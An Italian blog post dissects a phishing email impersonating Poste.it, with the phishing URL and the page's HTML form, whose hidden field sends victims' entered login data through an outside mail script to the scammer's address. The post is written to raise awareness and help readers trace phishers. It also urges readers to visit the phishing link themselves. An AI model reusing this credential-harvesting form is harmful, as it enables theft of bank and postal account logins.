Qualche giorno fa mi è arrivata un’Email di phishing che fingeva di essere un avviso del sito Poste.it
Sono stufo di questo genere di Email che (spesso) riescono a evitare di finire nella sezione Spam e me le ritrovo in Posta in arrivo.
Ho cliccato sull’avviso che diceva
Accedi ai servizi online di Poste.it e diventa Utente Verificato
Da notare che di solito le Email di phishing sono composte da un unica immagine, mentre questa era scritta. Ho cliccato sul link http://www.transpinter.com/bancopostaonline.poste.it/personale/postepay/formslogin.asp.html, da notare con che URL inizia l’indirizzo… Una volta sulla pagina ho tentato di scoprire chi era l’autore, e ve lo spiego in modo che anche voi possiate risalire agli autori delle varie Email di phishing che ricevete. Andate a questo link e poi fate Tasto destro - Visualizza sorgente pagina (con Firefox, non spiego come si fa con IE perchè voglio che passiate a Firefox) e poi scorrente un po’ il testo.
Oppure cercate il carattere @ visto che l’autore della pagina deve prendere i dati che la gente immette e inviarli ad una Email, di solito la propria. Scorrete un po’ fino a trovare questo pezzo (che è su una riga unica):
<FORM METHOD=“POST” ACTION=“http://www.qkxyq.com/thalasson/mailform.cgi” ENCTYPE=“x-www-form-urlencoded”> <input type=“hidden” name=“emailto” value=“catanabanana@gmail.com“> <input type=“hidden” name=“nextpage” value=“http://www.transpinter.com/bancopostaonline.poste.it/personale/postepay/poste_2.html”>
Abbiamo scoperto l’Email del truffatore: catanabanana@gmail.com
E’ probabile anche che sia un Email creata apposta per lo scopo, in modo da non essere scoperto.
Chi sa come denunciare questa persona conoscendo l’Email lo faccia. E me lo dica.
Recent Comments